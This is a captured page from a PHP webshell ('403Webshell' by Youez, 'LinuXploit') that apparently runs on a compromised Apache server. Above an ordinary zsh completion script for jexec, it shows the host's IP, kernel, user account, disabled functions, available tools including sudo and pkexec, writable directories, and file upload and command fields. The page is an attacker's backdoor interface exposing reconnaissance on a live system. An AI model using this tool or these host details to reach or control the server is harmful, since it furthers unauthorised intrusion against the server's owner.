403Webshell
Server IP : 51.89.169.208  /  Your IP : 216.73.216.94
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/proc/thread-self/root/usr/share/zsh/5.5.1/functions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/proc/thread-self/root/usr/share/zsh/5.5.1/functions/_jexec
#compdef jexec

_jexec_normal() {
  local PATH=$PATH
  local -a _comp_priv_prefix
  # relative paths are relative to the jail's root
  path=( "$(_call_program paths jls -j $words[1] path)"/$^path )
  shift 1 words; (( CURRENT-- ))
  _normal
}

_jexec() {
  _arguments -s -S -A "-*" : \
    '-l[execute in a clean environment]' \
    '(-U)-u[host environment user whom command runs as]:host user:_users' \
    '(-u)-U[jail environment user whom command runs as]:jail user:_users' \
    '1:jail:_jails' \
    '*:: : _jexec_normal'
}

_jexec "$@"

Youez - 2016 - github.com/yon3zu
LinuXploit